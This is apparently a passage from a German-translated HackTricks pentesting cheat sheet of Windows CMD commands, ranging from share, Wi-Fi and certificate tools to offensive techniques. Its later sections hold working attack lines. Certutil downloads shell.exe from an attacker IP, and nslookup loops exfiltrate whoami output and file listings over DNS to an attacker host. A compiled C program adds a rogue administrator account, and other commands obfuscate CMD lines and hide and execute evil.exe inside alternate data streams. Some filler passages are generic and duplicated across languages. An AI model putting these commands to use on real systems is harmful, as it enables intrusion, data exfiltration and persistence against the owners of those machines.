* `net share`: Zeigt eine Liste der Freigaben auf dem aktuellen System an.
* `net view \\192.168.0.100`: Zeigt eine Liste der Freigaben auf dem Remote-System mit der IP-Adresse 192.168.0.100 an.
* `net use \\192.168.0.100\freigabe Passwort123 /user:admin`: Verbindet sich mit der Freigabe "freigabe" auf dem Remote-System mit der IP-Adresse 192.168.0.100 unter Verwendung des Benutzernamens "admin" und des Passworts "Passwort123".
* `net use`: Zeigt eine Liste der aktuell verbundenen Freigaben an.
* `net use Z: /delete`: Trennt die Verbindung zum Laufwerk Z, das mit einer Freigabe verbunden ist.

```bash
net view #Get a list of computers
net view /all /domain [domainname] #Shares on the domains
net view \\computer /ALL #List shares of a computer
net use x: \\computer\share #Mount the share locally
net share #Check current shares
```

#### Wifi

**Windows**

**Get the list of available wifi networks**

```plaintext
netsh wlan show networks
```

**Connect to a wifi network**

```plaintext
netsh wlan connect name="wifi_name" ssid="wifi_ssid"
```

**Disconnect from a wifi network**

```plaintext
netsh wlan disconnect
```

**Get the wifi network password**

```plaintext
netsh wlan show profile name="wifi_name" key=clear
```

**Enable wifi interface**

```plaintext
netsh interface set interface name="Wi-Fi" admin=enable
```

**Disable wifi interface**

```plaintext
netsh interface set interface name="Wi-Fi" admin=disable
```

**Linux**

**Get the list of available wifi networks**

```plaintext
nmcli device wifi list
```

**Connect to a wifi network**

```plaintext
nmcli device wifi connect ssid "wifi_ssid" password "wifi_password"
```

**Disconnect from a wifi network**

```plaintext
nmcli device disconnect wlan0
```

**Enable wifi interface**

```plaintext
nmcli radio wifi on
```

**Disable wifi interface**

```plaintext
nmcli radio wifi off
```

**Mac**

**Get the list of available wifi networks**

```plaintext
/System/Library/PrivateFrameworks/Apple80211.framework/Versions/Current/Resources/airport -s
```

**Connect to a wifi network**

```plaintext
networksetup -setairportnetwork en0 wifi_ssid wifi_password
```

**Disconnect from a wifi network**

```plaintext
networksetup -setairportpower en0 off
```

**Enable wifi interface**

```plaintext
networksetup -setairportpower en0 on
```

**Disable wifi interface**

```plaintext
networksetup -setairportpower en0 off
```

```bash
netsh wlan show profile #AP SSID
netsh wlan show profile <SSID> key=clear #Get Cleartext Pass
```

#### SNMP

SNMP (Simple Network Management Protocol) ist ein Protokoll, das zur Verwaltung und Überwachung von Netzwerkgeräten verwendet wird. Es ermöglicht das Abrufen und Ändern von Informationen über diese Geräte. SNMP verwendet eine Client-Server-Architektur, bei der ein SNMP-Manager (Client) Informationen von SNMP-Agenten (Server) abruft.

**SNMP-Versionen**

Es gibt verschiedene Versionen von SNMP, darunter SNMPv1, SNMPv2c und SNMPv3.

* SNMPv1: Die erste Version von SNMP, die grundlegende Funktionen zur Überwachung und Verwaltung von Netzwerkgeräten bietet. Es verwendet eine einfache Community-basierte Authentifizierung, die jedoch unsicher ist, da die Community-Strings im Klartext übertragen werden.
* SNMPv2c: Eine verbesserte Version von SNMPv1, die zusätzliche Funktionen und Verbesserungen bietet. Es verwendet immer noch die Community-basierte Authentifizierung.
* SNMPv3: Die sicherste Version von SNMP, die erweiterte Sicherheitsfunktionen wie Verschlüsselung und Authentifizierung bietet. SNMPv3 verwendet Benutzernamen und Kennwörter für die Authentifizierung und Verschlüsselung für die Vertraulichkeit der übertragenen Daten.

**SNMP-Tools**

Es gibt verschiedene Tools, die für das Arbeiten mit SNMP verwendet werden können:

* `snmpwalk`: Ein Befehlszeilentool, das verwendet wird, um Informationen von SNMP-Agenten abzurufen. Es durchläuft die MIB (Management Information Base) und gibt die abgerufenen Informationen aus.
* `snmpget`: Ein Befehlszeilentool, das verwendet wird, um eine einzelne Information von einem SNMP-Agenten abzurufen.
* `snmpset`: Ein Befehlszeilentool, das verwendet wird, um eine einzelne Information auf einem SNMP-Agenten zu ändern.
* `snmptrap`: Ein Befehlszeilentool, das verwendet wird, um SNMP-Traps zu senden, die Ereignisse oder Fehler an den SNMP-Manager melden.

**SNMP-Sicherheit**

Da SNMPv1 und SNMPv2c unsichere Authentifizierungsmethoden verwenden, ist es wichtig, geeignete Sicherheitsmaßnahmen zu ergreifen, um die Sicherheit des SNMP-Verkehrs zu gewährleisten. Hier sind einige bewährte Sicherheitspraktiken:

* Verwenden Sie SNMPv3, um erweiterte Sicherheitsfunktionen wie Verschlüsselung und Authentifizierung zu nutzen.
* Verwenden Sie starke Kennwörter für die SNMP-Authentifizierung und ändern Sie sie regelmäßig.
* Begrenzen Sie den Zugriff auf SNMP-Agenten auf autorisierte IP-Adressen.
* Überwachen Sie den SNMP-Verkehr und suchen Sie nach verdächtigen Aktivitäten.
* Aktualisieren Sie regelmäßig die SNMP-Software, um Sicherheitslücken zu schließen.

**Zusammenfassung**

SNMP ist ein Protokoll zur Verwaltung und Überwachung von Netzwerkgeräten. Es gibt verschiedene Versionen von SNMP, darunter SNMPv1, SNMPv2c und SNMPv3. SNMP-Tools wie `snmpwalk`, `snmpget`, `snmpset` und `snmptrap` werden verwendet, um Informationen von SNMP-Agenten abzurufen, zu ändern und Traps zu senden. Es ist wichtig, angemessene Sicherheitsmaßnahmen zu ergreifen, um die Sicherheit des SNMP-Verkehrs zu gewährleisten, insbesondere bei der Verwendung von SNMPv1 und SNMPv2c.

```
reg query HKLM\SYSTEM\CurrentControlSet\Services\SNMP /s
```

#### Netzwerkschnittstellen

Network interfaces, also known as network adapters or NICs (Network Interface Cards), are hardware devices that allow a computer to connect to a network. They provide the necessary physical connection between the computer and the network, enabling communication between devices.

Netzwerkschnittstellen, auch als Netzwerkadapter oder NICs (Network Interface Cards) bekannt, sind Hardwaregeräte, die es einem Computer ermöglichen, sich mit einem Netzwerk zu verbinden. Sie stellen die erforderliche physische Verbindung zwischen dem Computer und dem Netzwerk her und ermöglichen die Kommunikation zwischen den Geräten.

```bash
ipconfig /all
```

#### ARP-Tabelle

Die ARP-Tabelle (Address Resolution Protocol) ist eine Tabelle, die in einem Betriebssystem gespeichert wird und die Zuordnung von IP-Adressen zu MAC-Adressen enthält. Sie wird verwendet, um die Kommunikation in einem lokalen Netzwerk zu ermöglichen, indem sie die MAC-Adresse eines Geräts anhand seiner IP-Adresse ermittelt.

Die ARP-Tabelle kann mithilfe des Befehls `arp -a` in der Eingabeaufforderung angezeigt werden. Dieser Befehl zeigt die IP-Adressen und die zugehörigen MAC-Adressen aller Geräte an, mit denen das System kommuniziert hat.

Die ARP-Tabelle ist auch ein nützliches Werkzeug für Pentester, da sie Informationen über die Geräte im Netzwerk liefert. Durch Überprüfen der ARP-Tabelle können Pentester feststellen, ob ein Gerät möglicherweise gefährdet ist oder ob ein Angreifer versucht, sich als ein anderes Gerät auszugeben (ARP-Spoofing).

Es ist wichtig, die ARP-Tabelle regelmäßig zu überprüfen und verdächtige Einträge zu identifizieren, um die Sicherheit des Netzwerks zu gewährleisten.

```bash
arp -A
```

### Herunterladen

Bitsadmin.exe

```
bitsadmin /create 1 bitsadmin /addfile 1 https://live.sysinternals.com/autoruns.exe c:\data\playfolder\autoruns.exe bitsadmin /RESUME 1 bitsadmin /complete 1
```

## CertReq.exe

CertReq.exe is a command-line tool in Windows that is used to create and submit certificate requests to a certification authority (CA). It is commonly used by system administrators and security professionals for managing certificates in a Windows environment.

### Usage

The basic syntax for using CertReq.exe is as follows:

```plaintext
certreq [options] [requestfile] [responsefile]
```

#### Options

Here are some commonly used options with CertReq.exe:

* **-new**: Creates a new certificate request.
* **-submit**: Submits a certificate request to a CA.
* **-accept**: Accepts a response to a certificate request.
* **-retrieve**: Retrieves a response to a certificate request.
* **-sign**: Signs a certificate request.
* **-policy**: Specifies the certificate policy to use.
* **-config**: Specifies the configuration file to use.
* **-attrib**: Specifies additional attributes for the certificate request.

#### Examples

Here are some examples of how CertReq.exe can be used:

* To create a new certificate request:

```plaintext
certreq -new request.inf request.req
```

* To submit a certificate request to a CA:

```plaintext
certreq -submit request.req response.req
```

* To accept a response to a certificate request:

```plaintext
certreq -accept response.req
```

* To retrieve a response to a certificate request:

```plaintext
certreq -retrieve request.req response.req
```

* To sign a certificate request:

```plaintext
certreq -sign request.req response.req
```

* To specify a certificate policy:

```plaintext
certreq -policy "PolicyName" request.req response.req
```

* To specify a configuration file:

```plaintext
certreq -config "ConfigFile" request.req response.req
```

* To specify additional attributes for the certificate request:

```plaintext
certreq -attrib "Attribute1=Value1&Attribute2=Value2" request.req response.req
```

### Conclusion

CertReq.exe is a powerful command-line tool for managing certificates in a Windows environment. It provides various options for creating, submitting, accepting, retrieving, and signing certificate requests. System administrators and security professionals can leverage CertReq.exe to streamline the certificate management process and enhance the security of their Windows systems.

```
CertReq -Post -config https://example.org/ c:\windows\win.ini output.txt
```

## Certutil.exe

Certutil.exe is a command-line utility in Windows that is used to manage certificates. It provides various functions for working with certificates, such as installing, exporting, and verifying them.

### Usage

To use Certutil.exe, open a command prompt and type `certutil` followed by the desired command and its parameters.

### Common Commands

Here are some common commands that can be used with Certutil.exe:

* **-addstore**: Adds a certificate or a certificate chain to a certificate store.
* **-delstore**: Deletes a certificate or a certificate chain from a certificate store.
* **-store**: Specifies the certificate store to use.
* **-view**: Displays the contents of a certificate or a certificate store.
* **-exportPFX**: Exports a certificate or a certificate chain to a Personal Information Exchange (PFX) file.
* **-importPFX**: Imports a certificate or a certificate chain from a PFX file.

### Examples

Here are some examples of how Certutil.exe can be used:

* To view the contents of the "My" certificate store, use the command: `certutil -viewstore -store "My"`
* To add a certificate to the "Trusted Root Certification Authorities" store, use the command: `certutil -addstore -f "Root" <certificate_file>`
* To export a certificate from the "Personal" store to a PFX file, use the command: `certutil -exportPFX -p <password> -f <certificate_name> <pfx_file>`

### Conclusion

Certutil.exe is a powerful command-line utility for managing certificates in Windows. It provides a wide range of functions for working with certificates, making it a valuable tool for pentesters and system administrators.

```
certutil.exe -urlcache -split -f "http://10.10.14.13:8000/shell.exe" s.exe
```

**Finden Sie noch mehr, indem Sie nach `Download` auf** [**https://lolbas-project.github.io**](https://lolbas-project.github.io/) **suchen**

### Sonstiges

```bash
cd #Get current dir
cd C:\path\to\dir #Change dir
dir #List current dir
dir /a:h C:\path\to\dir #List hidden files
dir /s /b #Recursive list without shit
time #Get current time
date #Get current date
shutdown /r /t 0 #Shutdown now
type <file> #Cat file

#Runas
runas /savecred /user:WORKGROUP\Administrator "\\10.XXX.XXX.XXX\SHARE\evil.exe" #Use saved credentials
runas /netonly /user:<DOMAIN>\<NAME> "cmd.exe" ::The password will be prompted

#Hide
attrib +h file #Set Hidden
attrib -h file #Quit Hidden

#Give full control over a file that you owns
icacls <FILE_PATH> /t /e /p <USERNAME>:F
icacls <FILE_PATH> /e /r <USERNAME> #Remove the permision

#Recursive copy to smb
xcopy /hievry C:\Users\security\.yawcam \\10.10.14.13\name\win

#exe2bat to transform exe file in bat file

#ADS
dir /r #Detect ADS
more file.txt:ads.txt #read ADS
powershell (Get-Content file.txt -Stream ads.txt)

# Get error messages from code
net helpmsg 32 #32 is the code in that case
```

#### Umgehung der Zeichen-Schwarzenliste

In einigen Fällen können Webanwendungen bestimmte Zeichen in Eingaben verbieten, um Sicherheitslücken zu verhindern. Dies wird als Zeichen-Schwarzenliste bezeichnet. Es ist jedoch möglich, diese Beschränkungen zu umgehen und dennoch schädlichen Code einzufügen.

Eine Möglichkeit, die Zeichen-Schwarzenliste zu umgehen, besteht darin, alternative Zeichen zu verwenden, die ähnlich aussehen, aber nicht auf der Liste stehen. Zum Beispiel kann das Zeichen "o" durch die Verwendung des griechischen Buchstabens "ο" ersetzt werden.

Eine andere Methode besteht darin, die Zeichenkodierung zu ändern. Durch die Verwendung von Unicode-Zeichen oder Hexadezimalwerten können verbotene Zeichen umgangen werden. Zum Beispiel kann das Zeichen "a" durch den Unicode-Wert "\u0061" oder den Hexadezimalwert "61" ersetzt werden.

Es ist wichtig zu beachten, dass das Umgehen der Zeichen-Schwarzenliste eine Form der Umgehung von Sicherheitsmaßnahmen darstellt und nur zu legitimen Zwecken verwendet werden sollte.

```bash
echo %HOMEPATH:~6,-11%   #\
who^ami   #whoami
```

#### DOSfuscation

Generiert eine verschleierte CMD-Zeile

```powershell
git clone https://github.com/danielbohannon/Invoke-DOSfuscation.git
cd Invoke-DOSfuscation
Import-Module .\Invoke-DOSfuscation.psd1
Invoke-DOSfuscation
help
SET COMMAND type C:\Users\Administrator\Desktop\flag.txt
encoding
```

#### Adressen-ACLs anhören

Sie können auf [http://+:80/Temporary\_Listen\_Addresses/](http://+/Temporary\_Listen\_Addresses/) ohne Administratorrechte zu haben.

```bash
netsh http show urlacl
```

#### Manuelle DNS-Shell

**Angreifer** (Kali) muss eine der folgenden 2 Optionen verwenden:

```bash
sudo responder -I <iface> #Active
sudo tcpdump -i <iface> -A proto udp and dst port 53 and dst ip <KALI_IP> #Passive
```

**Opfer**

Technik **`for /f tokens`**: Dies ermöglicht es uns, Befehle auszuführen, die ersten X Wörter jeder Zeile zu erhalten und sie über DNS an unseren Server zu senden.

```bash
for /f %a in ('whoami') do nslookup %a <IP_kali> #Get whoami
for /f "tokens=2" %a in ('echo word1 word2') do nslookup %a <IP_kali> #Get word2
for /f "tokens=1,2,3" %a in ('dir /B C:\') do nslookup %a.%b.%c <IP_kali> #List folder
for /f "tokens=1,2,3" %a in ('dir /B "C:\Program Files (x86)"') do nslookup %a.%b.%c <IP_kali> #List that folder
for /f "tokens=1,2,3" %a in ('dir /B "C:\Progra~2"') do nslookup %a.%b.%c <IP_kali> #Same as last one
#More complex commands
for /f "tokens=1,2,3,4,5,6,7,8,9" %a in ('whoami /priv ^| findstr /i "enable"') do nslookup %a.%b.%c.%d.%e.%f.%g.%h.%i <IP_kali> #Same as last one
```

Sie können auch die Ausgabe **umleiten** und sie dann **lesen**.

```
whoami /priv | finstr "Enab" > C:\Users\Public\Documents\out.txt
for /f "tokens=1,2,3,4,5,6,7,8,9" %a in ('type "C:\Users\Public\Documents\out.txt"') do nslookup %a.%b.%c.%d.%e.%f.%g.%h.%i <IP_kali>
```

### Aufrufen von CMD aus C-Code

In einigen Fällen kann es erforderlich sein, die Windows-Befehlszeile (CMD) aus C-Code heraus aufzurufen. Dies kann nützlich sein, um bestimmte Befehle oder Skripte auszuführen und die Ergebnisse in der C-Anwendung zu verarbeiten.

Um CMD aus C-Code heraus aufzurufen, können Sie die `system`-Funktion verwenden. Diese Funktion ermöglicht es Ihnen, einen Befehl als Zeichenkette an CMD zu übergeben und die Ausgabe des Befehls zu erhalten.

Hier ist ein Beispiel, wie Sie CMD aus C-Code heraus aufrufen können:

```c
#include <stdlib.h>

int main() {
    // Befehl, der ausgeführt werden soll
    char command[] = "dir";

    // CMD aufrufen und den Befehl ausführen
    system(command);

    return 0;
}
```

In diesem Beispiel wird der Befehl "dir" an CMD übergeben, der das Verzeichnis auflistet. Sie können den Befehl durch jeden anderen gültigen CMD-Befehl ersetzen.

Beachten Sie, dass die `system`-Funktion blockierend ist, d.h. die Ausführung der C-Anwendung wird angehalten, bis der aufgerufene Befehl abgeschlossen ist. Wenn Sie eine nicht blockierende Ausführung wünschen, können Sie stattdessen die `CreateProcess`-Funktion verwenden.

Es ist wichtig zu beachten, dass das Aufrufen von CMD aus C-Code heraus Sicherheitsrisiken mit sich bringen kann, insbesondere wenn Benutzereingaben in den Befehl einbezogen werden. Stellen Sie sicher, dass Sie alle Benutzereingaben ordnungsgemäß validieren und filtern, um potenzielle Angriffe zu verhindern.

```c
#include <stdlib.h>     /* system, NULL, EXIT_FAILURE */

// When executed by Administrator this program will create a user and then add him to the administrators group
// i686-w64-mingw32-gcc addmin.c -o addmin.exe
// upx -9 addmin.exe

int main (){
int i;
i=system("net users otherAcc 0TherAcc! /add");
i=system("net localgroup administrators otherAcc /add");
return 0;
}
```

### Alternate Data Streams Spickzettel (ADS/Alternate Data Stream)

**Beispiele entnommen von** [**https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f**](https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f)**. Es gibt noch viele weitere dort!**

```bash
## Selected Examples of ADS Operations ##

### Adding Content to ADS ###
# Append executable to a log file as an ADS
type C:\temp\evil.exe > "C:\Program Files (x86)\TeamViewer\TeamViewer12_Logfile.log:evil.exe"
# Download a script directly into an ADS
certutil.exe -urlcache -split -f https://raw.githubusercontent.com/Moriarty2016/git/master/test.ps1 c:\temp:ttt

### Discovering ADS Content ###
# List files and their ADS
dir /R
# Use Sysinternals tool to list ADS of a file
streams.exe <c:\path\to\file>

### Extracting Content from ADS ###
# Extract an executable stored in an ADS
expand c:\ads\file.txt:test.exe c:\temp\evil.exe

### Executing ADS Content ###
# Execute an executable stored in an ADS using WMIC
wmic process call create '"C:\Program Files (x86)\TeamViewer\TeamViewer12_Logfile.log:evil.exe"'
# Execute a script stored in an ADS using PowerShell
powershell -ep bypass - < c:\temp:ttt
```

<details>

<summary><strong>Lernen Sie AWS-Hacking von Null auf Held mit</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>

* Arbeiten Sie in einem **Cybersicherheitsunternehmen**? Möchten Sie Ihr **Unternehmen in HackTricks bewerben**? Oder möchten Sie Zugriff auf die **neueste Version von PEASS oder HackTricks im PDF-Format** haben? Überprüfen Sie die [**ABONNEMENTPLÄNE**](https://github.com/sponsors/carlospolop)!
* Entdecken Sie [**The PEASS Family**](https://opensea.io/collection/the-peass-family), unsere Sammlung exklusiver [**NFTs**](https://opensea.io/collection/the-peass-family).
* Holen Sie sich das [**offizielle PEASS & HackTricks-Merchandise**](https://peass.creator-spring.com).
* **Treten Sie der** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord-Gruppe**](https://discord.gg/hRep4RUj7f) oder der [**Telegram-Gruppe**](https://t.me/peass) bei oder **folgen** Sie mir auf **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Teilen Sie Ihre Hacking-Tricks, indem Sie PRs an das** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **und das** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud) **senden**.

</details>